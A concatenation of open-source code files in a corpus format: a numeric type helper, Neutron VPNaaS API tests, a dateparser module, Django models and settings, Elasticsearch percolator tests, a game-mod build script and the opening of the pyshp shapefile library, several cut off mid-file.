isoption = isinstance(measure, Option)
if isoption:
measure = measure.ty
if (not matches_typeset(measure, scalar) and
not isinstance(measure, (Decimal, TimeDelta))):
raise TypeError('measure must be numeric')
if measure == bool_:
result = bool_
elif isinstance(measure, (Decimal, TimeDelta)):
result = measure
else:
result = max(supertype(measure).types, key=lambda x: x.itemsize)
return Option(result) if isoption else result
|
oeeagle/quantum | neutron/tests/unit/services/vpn/test_vpnaas_extension.py | Python | apache-2.0 | 26,021 | 0.000038 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Swaminathan Vasudevan, Hewlett-Packard.
import copy
import mock
from oslo.config import cfg
from webob import exc
import webtest
from neutron.api import extensions
from neutron.api.v2 import attributes
from neutron.common import config
from neutron.extensions import vpnaas
from neutron import manager
from neutron.openstack.common import uuidutils
from neutron.plugins.common import constants
from neutron import quota
from neutron.tests.unit import test_api_v2
from neutron.tests.unit import test_extensions
from neutron.tests.unit import testlib_api
_uuid = uuidutils.generate_uuid
_get_path = test_api_v2._get_path
class VpnaasTestExtensionManager(object):
def get_resources(self):
# Add the resources to the global attribute map
# This is done here as the setup process won't
# initialize the main API router which extends
# the global attribute map
attributes.RESOURCE_ATTRIBUTE_MAP.update(
vpnaas.RESOURCE_ATTRIBUTE_MAP)
return vpnaas.Vpnaas.get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
class VpnaasExtensionTestCase(testlib_api.WebTestCase):
fmt = 'json'
def setUp(self):
super(VpnaasExtensionTestCase, self).setUp()
plugin = 'neutron.extensions.vpnaas.VPNPluginBase'
# Ensure 'stale' patched copies of the plugin are never returned
manager.NeutronManager._instance = None
# Ensure existing ExtensionManager is not used
extensions.PluginAwareExtensionManager._instance = None
# Create the default configurations
args = ['--config-file', test_api_v2.etcdir('neutron.conf.test')]
config.parse(args)
#just stubbing core plugin with LoadBalancer plugin
cfg.CONF.set_override('core_plugin', plugin)
cfg.CONF.set_override('service_plugins', [plugin])
self._plugin_patcher = mock.patch(plugin, autospec=True)
self.plugin = self._plugin_patcher.start()
instance = self.plugin.return_value
instance.get_plugin_type.return_value = constants.VPN
ext_mgr = VpnaasTestExtensionManager()
self.ext_mdw = test_extensions.setup_extensions_middleware(ext_mgr)
self.api = webtest.TestApp(self.ext_mdw)
super(VpnaasExtensionTestCase, self).setUp()
quota.QUOTAS._driver = None
cfg.CONF.set_override('quota_driver', 'neutron.quota.ConfDriver',
group='QUOTAS')
def tearDown(self):
self._plugin_patcher.stop()
self.api = None
self.plugin = None
cfg.CONF.reset()
super(VpnaasExtensionTestCase, self).tearDown()
def test_ikepolicy_create(self):
"""Test case to create an ikepolicy."""
ikepolicy_id = _uuid()
data = {'ikepolicy': {'name': 'ikepolicy1',
'description': 'myikepolicy1',
'auth_algorithm': 'sha1',
'encryption_algorithm': 'aes-128',
'phase1_negotiation_mode': 'main',
'lifetime': {
'units': 'seconds',
'value': 3600},
'ike_version': 'v1',
'pfs': 'group5',
'tenant_id': _uuid()}}
return_value = copy.copy(data['ikepolicy'])
return_value.update({'id': ikepolicy_id})
instance = self.plugin.return_value
instance.create_ikepolicy.return_value = return_value
res = self.api.post(_get_path('vpn/ikepolicies', fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_ikepolicy.assert_called_with(mock.ANY,
ikepolicy=data)
self.assertEqual(res.status_int, exc.HTTPCreated.code)
res = self.deserialize(res)
self.assertIn('ikepolicy', res)
self.assertEqual(res['ikepolicy'], return_value)
def test_ikepolicy_list(self):
"""Test case to list all ikepolicies."""
ikepolicy_id = _uuid()
return_value = [{'name': 'ikepolicy1',
'auth_algorithm': 'sha1',
'encryption_algorithm': 'aes-128',
'pfs': 'group5',
'ike_version': 'v1',
'id': ikepolicy_id}]
instance = self.plugin.return_value
instance.get_ikepolicies.return_value = return_value
res = self.api.get(_get_path('vpn/ikepolicies', fmt=self.fmt))
instance.get_ikepolicies.assert_called_with(mock.ANY,
fields=mock.ANY,
filters=mock.ANY)
self.assertEqual(res.status_int, exc.HTTPOk.code)
def test_ikepolicy_update(self):
"""Test case to u | pdate an ikepolicy."""
ikepolicy_id = _uuid()
update_data = {'ikepolicy': {'name': 'ikepolicy1',
| 'encryption_algorithm': 'aes-256'}}
return_value = {'name': 'ikepolicy1',
'auth_algorithm': 'sha1',
'encryption_algorithm': 'aes-256',
'phase1_negotiation_mode': 'main',
'lifetime': {
'units': 'seconds',
'value': 3600},
'ike_version': 'v1',
'pfs': 'group5',
'tenant_id': _uuid(),
'id': ikepolicy_id}
instance = self.plugin.return_value
instance.update_ikepolicy.return_value = return_value
res = self.api.put(_get_path('vpn/ikepolicies', id=ikepolicy_id,
fmt=self.fmt),
self.serialize(update_data))
instance.update_ikepolicy.assert_called_with(mock.ANY, ikepolicy_id,
ikepolicy=update_data)
self.assertEqual(res.status_int, exc.HTTPOk.code)
res = self.deserialize(res)
self.assertIn('ikepolicy', res)
self.assertEqual(res['ikepolicy'], return_value)
def test_ikepolicy_get(self):
"""Test case to get or show an ikepolicy."""
ikepolicy_id = _uuid()
return_value = {'name': 'ikepolicy1',
'auth_algorithm': 'sha1',
'encryption_algorithm': 'aes-128',
'phase1_negotiation_mode': 'main',
'lifetime': {
'units': 'seconds',
'value': 3600},
'ike_version': 'v1',
'pfs': 'group5',
'tenant_id': _uuid(),
'id': ikepolicy_id}
instance = self.plugin.return_value
instance.get_ikepolicy.return_value = return_value
res = self.api.get(_get_path('vpn/ikepolicies', id=ikepolicy_id,
fmt=self.fmt))
instance.get_ikepolicy.assert_called_with(mock.ANY,
ikepolicy_id,
fields=mo |
mpercich/Calendarize | ios/dateparser/lib/python2.7/site-packages/dateparser/freshness_date_parser.py | Python | mit | 3,641 | 0.001648 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import regex as re
from datetime import datetime
from datetime import time
from dateutil.relativedelta import relativedelta
from dateparser.utils import apply_timezone, localize_timezone
from .parser import time_parser
_UNITS = r'year|month|week|day|hour|minute|second'
PATTERN = re.compile(r'(\d+)\s*(%s)\b' % _UNITS, re.I | re.S | re.U)
class FreshnessDateDataParser(object):
""" Parses date string like "1 year, 2 months ago" and "3 hours, 50 minutes ago" """
def __init__(self):
self.now = None
def _are_all_words_units(self, date_string):
skip = [_UNITS,
r'ago|in|\d+',
r':|[ap]m']
date_string = re.sub(r'\s+', ' ', date_string.strip())
words = filter(lambda x: x if x else False, re.split(r'\W', date_string))
words = filter(lambda x: not re.match(r'%s' % '|'.join(skip), x), words)
return not list(words)
def _parse_time(self, date_string, settings):
"""Attemps to parse time part of date strings like '1 day ago, 2 PM' """
date_string = PATTERN.sub('', date_string)
date_string = re.sub(r'\b(?:ago|in)\b', '', date_string)
try:
return time_parser(date_string)
except:
pass
def parse(self, date_string, settings):
_time = self._parse_time(date_string, settings)
def apply_time(dateobj, timeobj):
if not isinstance(_time, time):
return dateobj
return dateobj.replace(
hour=timeobj.hour, minute=timeobj.minute,
second=timeobj.second, microsecond=timeobj.microsecond
)
if settings.RELATIVE_BASE:
if 'local' not in settings.TIMEZONE.lower():
self.now = localize_timezone(
settings.RELATIVE_BASE, settings.TIMEZONE)
else:
self.now = settings.RELATIVE_BASE
elif 'local' in settings.TIMEZONE.lower():
self.now = datetime.now()
else:
utc_dt = datetime.utcnow()
self.now = apply_timezone(utc_dt, settings.TIMEZONE)
date, period = self._parse_date(date_string)
if date:
date = apply_time(date, _time)
if settings.TO_TIMEZONE:
date = apply_timezone(date, settings.TO_TIMEZONE)
if not settings.RETURN_AS_TIMEZONE_AWARE:
date = date.replace(tzinfo=None)
self.now = None
return date, period
def _parse_date(self, date_string):
if not self._are_all_words_units(date_string):
return None, None
kwargs = self.get_kwargs(date_string)
if not kwargs:
return None, None
period = 'day'
if 'days' not in kwargs:
for k in ['weeks', 'months', 'years']:
if k in kwargs:
period = k[:-1]
break
td = relativedelta(**kwargs)
if re.search(r'\bin\b', date_string):
| date = self.now + td
else:
date = self.now - td
return date, period
def get_kwargs(self, date_string):
m = PATTERN. | findall(date_string)
if not m:
return {}
kwargs = {}
for num, unit in m:
kwargs[unit + 's'] = int(num)
return kwargs
def get_date_data(self, date_string, settings=None):
date, period = self.parse(date_string, settings)
return dict(date_obj=date, period=period)
freshness_date_parser = FreshnessDateDataParser()
|
interlegis/sapl | sapl/compilacao/models.py | Python | gpl-3.0 | 66,332 | 0.000167 | from django.contrib import messages
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models import F, Q
from django.db.models.aggregates import Max
from django.db.models.deletion import PROTECT
from django.http.response import Http404
from django.template import defaultfilters
from django.utils import timezone
from django.utils.decorators import classonlymethod
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from image_cropping.fields import ImageCropField, ImageRatioField
import reversion
from sapl.compilacao.utils import (get_integrations_view_names, int_to_letter,
int_to_roman)
from sapl.utils import YES_NO_CHOICES, get_settings_auth_user_model,\
texto_upload_path, restringe_tipos_de_arquivo_img
@reversion.register()
class TimestampedMixin(models.Model):
created = models.DateTimeField(
verbose_name=_('created'),
editable=False, blank=True, auto_now_add=True)
modified = models.DateTimeField(
verbose_name=_('modified'), editable=False, blank=True, auto_now=True)
class Meta:
abstract = True
@reversion.register()
class BaseModel(models.Model):
class Meta:
abstract = True
def clean(self):
"""
Check for instances with null values in unique_together fields.
"""
from django.core.exceptions import ValidationError
super(BaseModel, self).clean()
for field_tuple in self._meta.unique_together[:]:
unique_filter = {}
unique_fields = []
null_found = False
for field_name in field_tuple:
field_value = getattr(self, field_name)
if getattr(self, field_name) is None:
unique_filter['%s__isnull' % field_name] = True
null_found = True
else:
unique_filter['%s' % field_name] = field_value
unique_fields.append(field_name)
if null_found:
unique_queryset = self.__class__.objects.filter(
**unique_filter)
if self.pk:
unique_queryset = unique_queryset.exclude(pk=self.pk)
if unique_queryset.exists():
msg = self.unique_error_message(
self.__class__, tuple(unique_fields))
raise ValidationError(msg)
def save(self, force_insert=False, force_update=False, using=None,
update_fields=None, clean=True):
# método clean não pode ser chamado no caso do save que está sendo
# executado é o save de revision_pre_delete_signal
import inspect
funcs = list(filter(lambda x: x == 'revision_pre_delete_signal',
map(lambda x: x[3], inspect.stack())))
if clean and not funcs:
self.clean()
return models.Model.save(
self,
force_insert=force_insert,
force_update=force_update,
using=using,
update_fields=update_fields)
@reversion.register()
class PerfilEstruturalTextoArticulado(BaseModel):
sigla = models.CharField(
max_length=10, unique=True, verbose_name=_('Sigla'))
nome = models.CharField(max_length=50, verbose_name=_('Nome'))
padrao = models.BooleanField(
default=False,
choices=YES_NO_CHOICES, verbose_name=_('Padrão'))
parent = models.ForeignKey(
'self',
blank=True, null | =True, default=None,
related_name='perfil_parent_set',
on_delete=PROTECT,
| verbose_name=_('Perfil Herdado'))
class Meta:
verbose_name = _('Perfil Estrutural de Texto Articulado')
verbose_name_plural = _('Perfis Estruturais de Textos Articulados')
ordering = ['-padrao', 'sigla']
def __str__(self):
return self.nome
@property
def parents(self):
if not self.parent:
return []
parents = self.parent.parents + [self.parent, ]
return parents
@reversion.register()
class TipoTextoArticulado(models.Model):
sigla = models.CharField(max_length=3, verbose_name=_('Sigla'))
descricao = models.CharField(max_length=50, verbose_name=_('Descrição'))
content_type = models.OneToOneField(
ContentType,
blank=True, null=True,
on_delete=models.SET_NULL,
verbose_name=_('Modelo Integrado'))
participacao_social = models.BooleanField(
blank=False, default=False,
choices=YES_NO_CHOICES,
verbose_name=_('Participação Social'))
publicacao_func = models.BooleanField(
choices=YES_NO_CHOICES,
blank=False, default=False,
verbose_name=_('Histórico de Publicação'))
perfis = models.ManyToManyField(
PerfilEstruturalTextoArticulado,
blank=True, verbose_name=_('Perfis Estruturais de Textos Articulados'),
help_text=_("""
Apenas os perfis selecionados aqui estarão disponíveis
para o editor de Textos Articulados cujo Tipo seja este
em edição.
"""))
rodape_global = models.TextField(
verbose_name=_('Rodapé Global'),
help_text=_('A cada Tipo de Texto Articulado pode ser adicionado '
'uma nota global de rodapé!'),
default=''
)
class Meta:
verbose_name = _('Tipo de Texto Articulado')
verbose_name_plural = _('Tipos de Texto Articulados')
ordering = ('id',)
def __str__(self):
return self.descricao
PARTICIPACAO_SOCIAL_CHOICES = [
(None, _('Padrão definido no Tipo')),
(True, _('Sim')),
(False, _('Não'))]
STATUS_TA_PRIVATE = 99 # Só os donos podem ver
STATUS_TA_EDITION = 89
STATUS_TA_IMMUTABLE_RESTRICT = 79
STATUS_TA_IMMUTABLE_PUBLIC = 69
STATUS_TA_PUBLIC = 0
PRIVACIDADE_STATUS = (
(STATUS_TA_PRIVATE, _('Privado')), # só dono ve e edita
# só quem tem permissão para ver
(STATUS_TA_IMMUTABLE_RESTRICT, _('Imotável Restrito')),
# só quem tem permissão para ver
(STATUS_TA_IMMUTABLE_PUBLIC, _('Imutável Público')),
(STATUS_TA_EDITION, _('Em Edição')), # só quem tem permissão para editar
(STATUS_TA_PUBLIC, _('Público')), # visualização pública
)
@reversion.register()
class TextoArticulado(TimestampedMixin):
data = models.DateField(
blank=True,
null=True,
verbose_name=_('Data')
)
ementa = models.TextField(verbose_name=_('Ementa'))
observacao = models.TextField(
blank=True,
verbose_name=_('Observação')
)
numero = models.CharField(
max_length=8,
verbose_name=_('Número')
)
ano = models.PositiveSmallIntegerField(verbose_name=_('Ano'))
tipo_ta = models.ForeignKey(
TipoTextoArticulado,
blank=True,
null=True,
default=None,
verbose_name=_('Tipo de Texto Articulado'),
on_delete=models.PROTECT
)
participacao_social = models.BooleanField(
blank=True,
null=True,
default=False,
choices=PARTICIPACAO_SOCIAL_CHOICES,
verbose_name=_('Participação Social')
)
content_type = models.ForeignKey(
ContentType,
blank=True,
null=True,
default=None,
on_delete=models.PROTECT
)
object_id = models.PositiveIntegerField(
blank=True,
null=True,
default=None)
content_object = GenericForeignKey('content_type', 'object_id')
owners = models.ManyToManyField(
get_settings_auth_user_model(),
blank=True,
verbose_name=_('Donos do Texto Articulado')
)
editable_only_by_owners = models.BooleanField(
choices=YES_NO_CHOICES,
default=True,
verbose_name=_('Editável apenas pelos donos do Texto Articulado?')
)
editing_locked = models.BooleanField(
choices=YES_NO_CHOICES,
default=True,
verbose_name=_('Texto Articulado em E |
SelvorWhim/competitive | Codewars/ThinkingTestingAB.py | Python | unlicense | 217 | 0.013825 | # patt | ern seems to be multiplying every pair of digits from different numbers and adding them up
from itertools import product
def test_it(a, b):
return sum(int(d1)*int(d2) for | d1,d2 in product(str(a), str(b)))
|
Yelp/pyes | tests/test_percolator.py | Python | bsd-3-clause | 3,235 | 0.006182 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import unittest
from .estestcase import ESTestCase
from pyes.query import *
import unittest
class PercolatorTestCase(ESTestCase):
def setUp(self):
super(PercolatorTestCase, self).setUp()
mapping = { u'parsedtext': {'boost': 1.0,
'index': 'analyzed',
'store': 'yes',
'type': u'string',
"term_vector" : "with_positions_offsets"},
u'name': {'boost': 1.0,
'index': 'analyzed',
'store': 'yes',
'type': u'string',
"term_vector" : "with_positions_offsets"},
u'title': {'boost': 1.0,
'index': 'analyzed',
'store': 'yes',
'type': u'string',
"term_vector" : "with_positions_offsets"},
u'pos': {'store': 'yes',
'type': u'integer'},
u'uuid': {'boost': 1.0,
'index': 'not_analyzed',
'store': 'yes',
'type': u'string'}}
self.conn.create_index(self.index_name)
self.conn.put_mapping(self.document_type, {'properties':mapping}, self.index_name)
self.conn.create_percolator(
'test-index',
'test-perc1',
StringQuery(query='apple', search_fields='_all')
)
self.conn.create_percolator(
'test-index',
'test-perc2',
StringQuery(query='apple OR iphone', search_fields='_all')
)
self.conn.create_percolator(
'test-index',
'test-perc3',
StringQuery(query='apple AND iphone', search_fields='_all')
)
self.conn.refresh(self.index_name)
def t | est_percolator(self):
resu | lts = self.conn.percolate('test-index', 'test-type', PercolatorQuery({'name': 'iphone'}))
self.assertTrue('test-perc1' not in results['matches'])
self.assertTrue('test-perc2' in results['matches'])
self.assertTrue('test-perc3' not in results['matches'])
def test_or(self):
results = self.conn.percolate('test-index', 'test-type', PercolatorQuery({'name': 'apple'}))
self.assertTrue('test-perc1' in results['matches'])
self.assertTrue('test-perc2' in results['matches'])
self.assertTrue('test-perc3' not in results['matches'])
def test_and(self):
results = self.conn.percolate('test-index', 'test-type', PercolatorQuery({'name': 'apple iphone'}))
self.assertTrue('test-perc1' in results['matches'])
self.assertTrue('test-perc2' in results['matches'])
self.assertTrue('test-perc3' in results['matches'])
def tearDown(self):
self.conn.delete_percolator('test-index', 'test-perc1')
self.conn.delete_percolator('test-index', 'test-perc2')
self.conn.delete_percolator('test-index', 'test-perc3')
super(PercolatorTestCase, self).tearDown()
if __name__ == "__main__":
unittest.main()
|
puittenbroek/slimmermeten | slimmermeten/settings/base.py | Python | bsd-3-clause | 9,633 | 0.001661 | """
This is your project's main settings file that can be committed to your
repo. If you need to override a setting locally, use local.py
"""
import os
import logging
# Normally you should not import ANYTHING from Django directly
# into your settings, but ImproperlyConfigured is an exception.
from django.core.exceptions import ImproperlyConfigured
def get_env_setting(setting):
""" Get the environment setting or return exception """
try:
return os.environ[setting]
except KeyError:
error_msg = "Set the %s env variable" % setting
raise ImproperlyConfigured(error_msg)
# Your project root
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__) + "../../../")
SUPPORTED_NONLOCALES = ['media', 'admin', 'static']
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# Defines the views served for root URLs.
ROOT_URLCONF = 'slimmermeten.urls'
# Application definition
INSTALLED_APPS = (
# Django contrib apps
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.admin',
'django.contrib.humanize',
'django.contrib.syndication',
'django.contrib.staticfiles',
# Third-party apps, patches, fixes
'djcelery',
'debug_toolbar',
'compressor',
# Database migrations
'south',
# Application base, containing global templates.
'base',
# Local apps, referenced via appname
'slimmermeten'
)
# Place bcrypt first in the list, so it will be the default password hashing
# mechanism
PASSWORD_HASHERS = (
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.SHA1PasswordHasher',
'django.contrib.auth.hashers.MD5PasswordHasher',
'django.contrib.auth.hashers.CryptPasswordHasher',
)
# Sessions
#
# By default, be at least somewhat secure with our session cookies.
SESSION_COOKIE_HTTPONLY = True
# Set this to true if you are using https
SESSION_COOKIE_SECURE = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.example.com/media/"
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.example.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.example.com/static/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')
# URL prefix for static files.
# Example: "http://media.example.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale |
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = False
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Eu | rope/Amsterdam'
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
]
TEMPLATE_CONTEXT_PROCESSORS = [
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.media',
'django.core.context_processors.request',
'django.core.context_processors.i18n',
'django.core.context_processors.static',
'django.core.context_processors.csrf',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
]
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or
# "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(PROJECT_ROOT, 'templates'),
)
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
def custom_show_toolbar(request):
""" Only show the debug toolbar to users with the superuser flag. """
return request.user.is_superuser
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TOOLBAR_CALLBACK': 'slimmermeten.settings.base.custom_show_toolbar',
'HIDE_DJANGO_SQL': True,
'TAG': 'body',
'SHOW_TEMPLATE_CONTEXT': True,
'ENABLE_STACKTRACES': True,
}
# DEBUG_TOOLBAR_PANELS = (
# #'debug_toolbar_user_panel.panels.UserPanel',
# 'debug_toolbar.panels.version.VersionDebugPanel',
# 'debug_toolbar.panels.timer.TimerDebugPanel',
# 'debug_toolbar.panels.settings_vars.SettingsVarsDebugPanel',
# 'debug_toolbar.panels.headers.HeaderDebugPanel',
# 'debug_toolbar.panels.request_vars.RequestVarsDebugPanel',
# 'debug_toolbar.panels.template.TemplateDebugPanel',
# 'debug_toolbar.panels.sql.SQLDebugPanel',
# 'debug_toolbar.panels.signals.SignalDebugPanel',
# 'debug_toolbar.panels.logger.LoggingPanel',
# )
# Specify a custom user model to use
#AUTH_USER_MODEL = 'accounts.MyUser'
FILE_UPLOAD_PERMISSIONS = 0o0664
# The WSGI Application to use for runserver
WSGI_APPLICATION = 'slimmermeten.wsgi.application'
# Define your database connections
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.',
'NAME': '',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
#'OPTIONS': {
# 'init_command': 'SET storage_engine=InnoDB',
# 'charset' : 'utf8',
# 'use_unicode' : True,
#},
#'TEST_CHARSET': 'utf8',
#'TEST_COLLATION': 'utf8_general_ci',
},
# 'slave': {
# ...
# },
}
# Uncomment this and set to all slave DBs in use on the site.
# SLAVE_DATABASES = ['slave']
# Recipients of traceback emails and other notifications.
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
# SECURITY WARNING: don't run with debug turned on in production!
# Debugging displays nice error messages, but leaks memory. Set this to False
# on all server instances and True only for development.
DEBUG = TEMPLATE_DEBUG = False
# Is this a development instance? Set this to True on development/master
# instances and False on stage/prod.
DEV = False
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# SECURITY WARNING: keep the secret key used in production secret!
# |
dex4er/django-pyc | test_project/tests.py | Python | lgpl-3.0 | 333 | 0 | from django.cor | e.management import call_command
from django.test import TestCase
class ClearCache(TestCase):
@staticmethod
def test_compilepyc():
call_command('compilepyc', 'django_pyc', verbosity=1, force=True)
@staticmethod
def test_clearpyc():
| call_command('clearpyc', verbosity=1, force=True)
|
resamsel/dbmanagr | src/dbmanagr/driver/sqlite/driver.py | Python | gpl-3.0 | 1,308 | 0 | # -*- coding: utf-8 -*-
#
# Copyright © 2014 René Samselnig
#
# This file is part of Database Navigator.
#
# Database Navigator is free software: you can redistribute it a | nd/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Database Navigator is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty o | f
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Database Navigator. If not, see <http://www.gnu.org/licenses/>.
#
import logging
from dbmanagr.logger import LogWith
from dbmanagr.options import restriction, FileOptionsParser
from dbmanagr.driver import DatabaseDriver
logger = logging.getLogger(__name__)
class SQLiteDriver(DatabaseDriver):
@LogWith(logger)
def restriction(self, *args):
return restriction(*args)
def statement_activity(self, con):
return []
def __repr__(self):
return str(self.__dict__)
class SQLiteOptionsParser(FileOptionsParser):
def create_driver(self):
return SQLiteDriver()
|
BourbonWarfare/POTATO | tools/build.py | Python | gpl-2.0 | 2,898 | 0.006901 | #!/usr/bin/env python3
import os
import sys
import subprocess
######## GLOBALS #########
MAINPREFIX = "z"
PREFIX = "potato_"
##########################
def tryHemttBuild(projectpath):
hemttExe = os.path.join(projectpath, "hemtt.exe")
if os.path.isfile(hemttExe):
os.chdir(projectpath)
ret = subprocess.call([hemttExe, "pack"], stderr=subprocess.STDOUT)
print("Using hemtt: {}".format(ret));
return True
else:
print("hemtt not installed");
return False
def mod_time(path):
if not os.path.isdir(path):
return os.path.getmtime(path)
maxi = os.path.getmtime(path)
for p in os.listdir(path):
maxi = max(mod_time(os.path.join(path, p)), maxi)
return maxi
def check_for_changes(addonspath, module):
if not os.path.exists(os.path.join(addonspath, "{}{}.pbo".format(PREFIX,module))):
return True
return mod_time(os.path.join(addonspath, module)) > mod_time(os.path.join(addonspath, "{}{}.pbo".format(PREFIX,module)))
def check_for_obsolete_pbos(addonspath, file):
module = file[len(PREFIX):-4]
if not os.path.exists(os.path.join(addonspath, module)):
return True
return False
def main():
print("""
####################
# POTATO Debug Build #
####################
""")
scriptpath = os.path.realpath(__file__)
projectpath = os.path.dirname(os.path.dirname(scriptpath))
addonspath = os.path.join(projectpath, "addons")
if (tryHemttBuild(projectpath)): return
os.chdir(addonspath)
made = 0
failed = 0
skipped = 0
removed = 0
for file in os.listdir(addonspath):
if os.path.isfile(file):
if check_for_obsolete_pbos(addonspath, file):
removed += 1
print(" Remov | ing obsolete file => " + file)
os.remove(file)
print("")
for p in os.listdir(addonspath):
path = os.path.join(addonspath, p)
if not os.path.isdir(path):
continue
if p[0] == ".":
continue
if not check_for_changes(addonspath, p):
skipped += 1
print(" Skipping {}.".format(p))
continue
print("# Making {} ...".format(p))
| try:
subprocess.check_output([
"makepbo",
"-NUP",
"-@={}\\{}\\addons\\{}".format(MAINPREFIX,PREFIX.rstrip("_"),p),
p,
"{}{}.pbo".format(PREFIX,p)
], stderr=subprocess.STDOUT)
except:
failed += 1
print(" Failed to make {}.".format(p))
else:
made += 1
print(" Successfully made {}.".format(p))
print("\n# Done.")
print(" Made {}, skipped {}, removed {}, failed to make {}.".format(made, skipped, removed, failed))
if __name__ == "__main__":
sys.exit(main())
|
CalebM1987/pyshp | shapefile.py | Python | mit | 47,927 | 0.005529 | """
shapefile.py
Provides read and write support for ESRI Shapefiles.
author: jlawhead<at>geospatialpython.com
date: 2015/06/22
version: 1.2.3
Compatible with Python versions 2.4-3.x
version changelog: Reader.iterShapeRecords() bugfix for Python 3
"""
__version__ = "1.2.3"
from struct import pack, unpack, calcsize, error
import os
import sys
import time
import array
import tempfile
import itertools
import datetime
import re
#
# Constants for shape types
NULL = 0
POINT = 1
POLYLINE = 3
POLYGON = 5
MULTIPOINT = 8
POINTZ = 11
POLYLINEZ = 13
POLYGONZ = 15
MULTIPOINTZ = 18
POINTM = 21
POLYLINEM = 23
POLYGONM = 25
MULTIPOINTM = 28
MULTIPATCH = 31
PYTHON3 = sys.version_info[0] == 3
DATE_EXP = re.compile('\d{4}[-/]\d{2}[-/]\d{2}')
if PYTHON3:
xrange = range
izip = zip
basestring = str
else:
from itertools import izip
def b(v):
if PYTHON3:
if isinstance(v, str):
# For python 3 encode str to bytes.
return v.encode('utf-8')
elif isinstance(v, bytes):
# Already bytes.
return v
else:
# Error.
raise Exception('Unknown input type')
else:
# For python 2 assume str passed in and return str.
return v
def u(v):
if PYTHON3:
# try/catch added 2014/05/07
# returned error on dbf of shapefile
# from www.naturalearthdata.com named
# "ne_110m_admin_0_countries".
# Just returning v as is seemed to fix
# the problem. This function could
# be condensed further.
try:
if isinstance(v, bytes):
# For python 3 decode bytes to str.
return v.decode('utf-8')
elif isinstance(v, str):
# Already str.
return v
else:
# Error.
raise Exception('Unknown input type')
except: return v
else:
# For python 2 assume str passed in and return str.
return v
def is_string(v):
if PYTHON3:
return isinstance(v, str)
else:
return isinstance(v, basestring)
class _Array(array.array):
"""Converts python tuples to lits of the appropritate type.
Used to unpack different shapefile header parts."""
def __repr__(self):
return str(self.tolist())
def signed_area(coords):
"""Return the signed area enclosed by a ring using the linear time
